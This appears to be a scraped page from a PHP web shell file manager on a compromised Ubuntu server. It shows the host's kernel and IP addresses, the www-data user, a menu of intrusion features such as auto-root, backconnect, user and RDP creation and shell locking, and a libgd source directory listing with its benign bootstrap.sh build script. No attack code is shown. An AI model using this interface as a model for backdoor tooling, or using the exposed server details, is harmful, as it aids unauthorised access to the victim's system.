Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.191.14.62
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gsh /
libgd-gd-2.2.3 /
[ HOME SHELL ]
Name
Size
Permission
Action
VMS
[ DIR ]
drwxr-xr-x
cmake
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
m4
[ DIR ]
drwxr-xr-x
netware
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
travis
[ DIR ]
drwxr-xr-x
windows
[ DIR ]
drwxr-xr-x
.gitignore
1.41
KB
-rwxr-xr-x
.travis.yml
869
B
-rwxr-xr-x
CMakeLists.txt
7.25
KB
-rwxr-xr-x
CODE_OF_CONDUCT.md
3.17
KB
-rwxr-xr-x
CONTRIBUTORS
289
B
-rwxr-xr-x
COPYING
2.25
KB
-rwxr-xr-x
ChangeLog
6.88
KB
-rwxr-xr-x
Makefile.am
160
B
-rwxr-xr-x
NEWS
5.68
KB
-rwxr-xr-x
README.md
1.9
KB
-rwxr-xr-x
appveyor.yml
7.69
KB
-rwxr-xr-x
bootstrap.sh
790
B
-rwxr-xr-x
configure.ac
9.84
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bootstrap.sh
#!/bin/sh -- # $Id$ # Small shell script to build gd from source v() { echo "$@"; "$@"; } # Generate the manual (unless naturaldocs isn't installed). Source # dists should include the docs so that end users don't need to # install naturaldocs. At the same time, we tolerate it being missing # so that random hackers don't need it just to build the code. v docs/naturaldocs/run_docs.sh --nonfatal if echo "${OSTYPE:-$(uname)}" | grep -q '^darwin' ; then echo "Having trouble on OS X? Try: brew install autoconf libtool automake gettext apple-gcc42 pkg-config cmake" fi if ! v autoreconf -f -i ; then exit 1 fi ( echo "/* Generated from config.hin via autoheader for cmake; see bootstrap.sh. */" sed \ -e '1d' \ -e 's:#undef:#cmakedefine:' \ src/config.hin ) > src/config.h.cmake
Close